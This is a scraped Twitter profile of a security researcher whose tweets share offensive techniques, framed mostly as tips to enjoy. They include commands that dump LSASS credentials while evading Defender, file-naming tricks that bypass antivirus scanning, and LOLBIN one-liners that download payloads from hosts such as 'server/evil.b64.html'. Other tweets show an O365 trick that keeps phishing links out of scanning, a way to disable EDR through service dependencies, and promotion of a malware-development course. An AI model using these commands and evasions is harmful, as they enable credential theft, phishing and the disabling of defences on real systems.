mr.d0x
@mrd0x
Followers
40,304
Following
247
Media
45
Statuses
1,082
Security researcher | Co-founder | | |
Joined November 2020
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Madonna
• 161964 Tweets
Amethi
• 94670 Tweets
Bucks
• 78713 Tweets
Knicks
• 68233 Tweets
#無責任でええじゃないかLOVE
• 61659 Tweets
Dame
• 59920 Tweets
Racing
• 57904 Tweets
Pacers
• 48751 Tweets
憲法記念日
• 45593 Tweets
Game 7
• 44485 Tweets
Sixers
• 43055 Tweets
Leafs
• 30624 Tweets
Brunson
• 27962 Tweets
dua lipa
• 25371 Tweets
Bruins
• 24380 Tweets
Rony
• 24126 Tweets
Giannis
• 22830 Tweets
Maxey
• 22797 Tweets
#PONDSXTZUYU
• 21843 Tweets
Estevão
• 19471 Tweets
Willy
• 17842 Tweets
Costas
• 15830 Tweets
76ers
• 15228 Tweets
Arias
• 12713 Tweets
設営完了
• 11757 Tweets
チャレンジクルー
• 11348 Tweets
Romulo
• 10798 Tweets
Buddy Hield
• 10681 Tweets
Last Seen Profiles
Pinned Tweet
MalDev Academy is ready!
Website: MaldevAcademy[.]com
Launch date: April 16th, 2023
- 32 Beginner modules
- 49 Intermediate modules
- 10 Advanced modules
- 20 in the works for updates in the next few months
- 65 Custom code samples
Very fair pricing, starting at 249$
@NUL0x4C
52
204
851
I published a blog article detailing a phishing technique I called Browser in the Browser (BITB) Attack. It's very simple but can be very effective. I also published templates on my Github feel free to test them out.
118
1K
4K
If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.
49
1K
3K
Bypass Defender AV static detection:
If you name a malicious file DumpStack.log Defender doesn't scan it.
44
1K
3K
I'll be dropping a new phishing technique for stealing credentials & bypassing 2FA today. You do not want to miss this.
41
401
2K
Here I bypassed Defender AV by making:
.eyb files as .exe
.faq files as .dll
I'm sure this can work on other security solutions and for many other blacklisted techniques. (1/2)
29
517
2K
Chromium's application mode can be used to easily build realistic phishing desktop applications. Enjoy.
28
472
1K
Reminder that creating a memory dump of Outlook.exe not only produces access tokens but also potentially sensitive email content.
20
260
1K
LOLBIN to dump LSASS:
Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
Binary: DumpMinitool.exe
The params are case sensitive.
16
313
950
Another way to download files using msedge/chrome:
[msedge.exe | chrome.exe] --headless --enable-logging --disable-gpu --dump-dom "
http://server/evil.b64.html"
> out.b64
- Downloaded file should end with .html.
- Binaries should be encoded.
5
353
914
Today I've launched . I've been analyzing malware source code that utilizes WinAPIs and have been categorizing them. Please feel free to contribute as I know the current list is not exhaustive.
26
364
908
Living Off Trusted Sites:
Attackers are using popular legitimate domains to conduct attacks (e.g. phishing). I've attempted to compile a list of legitimate domains that can be abused by attackers. As usual, feel free to contribute.
33
352
874
Stealing Access Tokens From Office Desktop Applications
9
277
828
Bypassing Cortex XDR
27
301
806
It seems that you can still completely bypass Defender AV's static detection using *.log files, only now you have to use DLLs instead of EXEs.
11
266
793
If you compose an email using the "Reply" function on O365 which has a link, intercept the request and add an extra empty href attribute then O365 won't scan the link anymore.
<a href="phishing link">click</a> ==> junk
<a href="" href="phishing link">click</a> ==> inbox
11
246
766
For the past couple of months
@NUL0x4C
and I have been working on a module-based malware dev training course that covers various techniques in-depth. Its emphasis is on simplifying complex concepts & evasion. Every module contains highly commented custom code. Stay tuned!
37
163
767
Inserted attachments on OneNote can be directly downloaded. The domain used is onenoteonlinesync[.]onenote[.]com
1. Insert a file attachment on a OneNote Notebook
2. Double click the inserted attachment and grab the direct download link.
Added to
7
228
703
EvilSelenium - This project weaponizes Selenium to attack Chrome. Dump saved credentials, cookies, take (authenticated) screenshots, dump emails from gmail/o365 or chats from Whatsapp and exfiltrate & download files. ENJOY.
8
274
658
Twitter is great for sharing infosec related stuff, but it's also too dynamic and people may miss stuff. So every few months I'll link any interesting tweets I had made. Enjoy.
13
175
626
msedge kiosk mode + a fake Windows login page. Don't know if it's practical, but interesting for sure.
msedge.exe --app="
http://example[.]com/index.html"
--kiosk
8
130
605
Outlook attachments can be directly downloaded.
1. Compose an email
2. Attach a file (add .txt to the end if it's a restricted file type)
3. Click on the file to download it and grab the link (attachment[.]outlook[.]live[.]net)
Link is valid for ~15 minutes.
16
212
606
LOLBIN(s): mpiexec.exe & smpd.exe
Path: C:\Program Files\Microsoft MPI\Bin
mpiexec.exe spawns smpd.exe which then spawns an executable.
Usage: mpiexec.exe -n 1 c:\path\to\binary.exe
(1/2)
2
227
579
explorer.exe can launch a browser and download a file. Append a harmless extension to the file then remove it after download.
Default browser:
explorer.exe
https://server/file.exe.txt
Edge:
explorer.exe microsoft-edge:
https://server/file.exe.txt
5
161
503
Abusing Google Drive's Email File Functionality for phishing. Enjoy!
5
191
491
Anyone else aware that .asd files can contain macros? Literally just found out.
Added to Filesec:
7
145
452
WebView2 desktop applications have functionality that allows for JS to be injected into any website & for cookies to be stolen.
In my new blog post I explore how it can be used by attackers and I provide working code. Enjoy!
14
163
419
Demo:
Injecting a JS keylogger using WebView2 into login[.]microsoftonline[.]com.
Better quality:
Blog post:
10
143
393
Didn't have time to talk about the newly released TLDs last week, but here we go.
File Archiver In The Browser: Emulating file archive software in the browser with a .zip domain for phishing
11
147
384
Phishing O365 Users With Spoofed Cloud Attachments
3
156
369
Procdump dump lsass
Defender: Threat detected!
Sqldumper dump lsass
Defender: Sure, go right ahead!
btw dumping lsass with sqldumper.exe is not new, actually its quite old.
5
98
362
devinit.exe - Great MS signed tool with tons of useful commands but needs VS to run properly.
I tested msi-install, it downloads a msi file to C:\Windows\Installer\ then installs it.
devinit.exe run -t msi-install -i
http://10.0.0.18/out.msi
4
116
354
LOLBIN: Microsoft.NodejsTools.PressAnyKey.exe
Execute a local binary or one from a file share.
Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools
2
118
335
Procdump works against Defender with a simple rename. It quarantines the generated .dmp file but you have a few seconds to make a copy of it before it's removed.
I've seen other security solutions that do this, try to copy the file quickly before it's removed.
8
89
286
I've create a simple Python script that converts executables generated with pe_to_shellcode to a format that works with cdb.exe. Useful for evasion & application whitelisting bypass.
0
117
277
Attempting to access protection history after detecting a malicious file with a really long name + path crashes Defender's UI lol.
7
45
263
How much awareness is there around Context Menu Spoofing/Hijacking for persistence?
Here's hijacking SentinelOne's "Scan for threats" to run a command.
6
70
240
You can spoof almost everything in a Calendar invite by customizing an .ics file. I think this can definitely trick many users.
2
88
226
You should probably be aware of this technique.
Custom Previews For Malicious Attachments.
3
89
212
Start Edge minimized, download file, delay a few seconds to allow download to complete and kill Edge.
start /min msedge.exe
https://server/file.exe.zip
&& timeout 3 && taskkill /IM "msedge.exe" /F
Modify file extension back to original after download.
5
74
210
I mentioned a few days ago that there's two LOLBIN binaries that do DLL injection.
After re-checking the digital signature I don't believe they're considered LOLBINs (correct me if I'm wrong) but since they're interesting I'll share them anyway. (1/2)
2
76
204
"Although the code and the technique was copied from the mrd0x original blogpost dating back to 2022, the analysed document is currently only detected by one antivirus engine on VirusTotal (eScan) at the time of writing." 🤔
3
46
195
Hijacking & Spoofing Context Menu Options
5
49
176
Tampering with ForcePoint DLP
Write up on CVE-2022-27608 & CVE-2022-27609
5
48
154
I'll be dropping two variations of a new initial access technique exclusively for
@MalDevAcademy
premium & lifetime users (in update 2 or update 3).
Red teamers you'll be very happy.
Blue teamers you'll want to have safeguards in place for this.
3
23
154
I actually didn't know the about the Windows Device Portal feature. Kernel & process dumps, process and network information, application management all with optional authentication? I'll take it.
3
36
145
All security solution vulns I previously found were too easily exploitable.
In the newly posted Exploiting EDRs For Evasion module in
@MalDevAcademy
I demonstrated how changing a non-protected registry key prevents logs from arriving to the EDR console. Too easy.
5
21
134
Check out AtomLdr, something you'll be able to build after completing this training.
3
27
133
I guess this is their way of whitelisting their dump64.exe tool that comes with Microsoft Visual Studio.
1
10
119
Havoc made the cut
@C5pider
🎉
Before we wrap up the year, it’s time to get out one last Kali release for 2023.
Announcing Kali 2023.4! for a focus on the addition of Hyper-V support to Vagrant, ARM64 Cloud images, support for the Pi 5, and an update to Gnome 45. Check it out!
29
336
2K
1
3
122
20 new websites added to
An interesting site added is feedproxy[.]google[.]com. I was not aware that it's being used in phishing attacks. Creds:
@BushidoToken
7
31
117
Outlook link preview spoofing.
Either modify the HTML while sending it or insert a different link when it tries to fetch a preview of the site.
1
7
107
Since any file extension can be modified to become executable, wouldn't something like this mess with rules that look for "cmd.exe" spawning "powershell.exe" for example?
4
5
99
Just added a new batch of sites to . Thanks to all the contributors. Will continue to add more.
2
21
98
For example, to make .eyb act as a .exe go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb and modify it as shown in the image. (2/2)
4
15
94
I'll be disclosing a new LOLBIN this week on the
@MalDevAcademy
Discord channel that can be used for downloading files on the machine. Stay tuned!
2
6
86
Review:
0
18
84
Hope you all enjoy it.
4
12
82
Hide your phishing link behind Google's domain. Thanks Google you're always adding some great "features".
0
37
81
Please make sure you're aware that this technique is not necessarily VNC specific. Of course it can work with any web-based remote access method (e.g. web-based RDP, TeamViewer etc).
But I felt noVNC provided the most seamless experience to target users.
1
15
79
Another 30 APIs added to since yesterday. Thanks for all your support. Please continue submitting APIs I'll add them as soon as possible.
0
17
74
t[.]m1[.]email[.]samsung[.]com is being used to redirect users to phishing websites.
Reference:
1
20
72
Finally had some time to push new APIs on . Sorry for the delay and thanks to all contributors.
1
14
72
Since MS Teams now allows external users to message users within an organization, the Teams Abuse article may be worth a revisit.
I also updated it to add a few more techniques.
2
19
72
I disabled multiple security solutions using a simple method which involves stopping/modifying the dependencies of the service.
1. sc qc <service> ==> check dependencies
2. sc qc <dependency> ==> stop it or attempt to modify it through the registry.
0
14
66
Why does it feel like we're asking for too much?
All we want is a basic web browser with an ad blocker.
66
139
3K
2
3
67
I really like 12ft[.]io which is used to bypass paywalls. But be aware that it can also be used to masquerade phishing links.
Reference:
0
12
58
Sorry if the images are blurry on the blog post. They are available on the Github Repo in far better resolution:
0
8
61
@Warlockobama
That's the first thing that comes to mind for sure. But now users will have 3 thoughts when they notice this:
1.Suspicious
2.Technical glitch
3.Intended "feature"
Maybe if we're lucky our odds may just be the latter two.
1
4
60
Cortex XDR advisory
5
6
58
Turns out args: 0,2,4 are useless and can be literally anything as long as args 1,3,5 are valid. Watch out for this if you're writing detection rules.
@mrd0x
Example that works:
./DumpMinitool.exe 1 'dump6.txt' 2 660 3 Full
Dump minitool: Started with arguments 1 dump6.txt 2 660 3 Full
Output file: 'dump6.txt'
Process id: 660
Dump type: Full
Dumped process.
0
1
9
1
12
43
Can confirm this works. Another way is to send an email saying "There's IT work going on you may receive a 2FA prompt, just accept it." Surprisingly it works.
1
8
44
@techspence
I only tested it with downloading and copying from a remote share. Using SMB is shown in the attached image.
Also note that it's still subject to other methods of detection like behavior, heuristics etc.
1
2
42
@NinjaParanoid
I feel like it’s a small part of the community but they’re just very loud and always seem to be morally and intellectually superior than everyone else
2
0
43
@mythicalcmd
@NUL0x4C
This training is far more in-depth. Also its text-based not video-based. There's custom code (all commented) and exclusive tools shared on there. Here's an example of one module that covers a custom tool 'HellShell'.
2
5
42
Thanks to all those contributing and sorry for the delay.
=> new extensions added.
=> new APIs added.
1
15
38
I'll be disclosing a new LOLBIN this week on the
@MalDevAcademy
Discord channel that can be used for downloading files on the machine. Stay tuned!
2
6
86
0
2
38
Microsoft took measures to ensure the link breaks if this is done when an email is composed normally. But when sent using the 'Reply' or 'Reply All' functionality that protection mechanism doesn't kick in.
0
2
34
PAN-SA-2022-0001 demo. Obtain password hash, crack password, disable tamper protection, and uninstall Cortex.
0
7
33
Added:
Although this can also be used for phishing, its severely restricted due to the time limit & file type restrictions. I can still add it as a phishing technique if people think its worth adding. Any comments are welcome.
1
3
31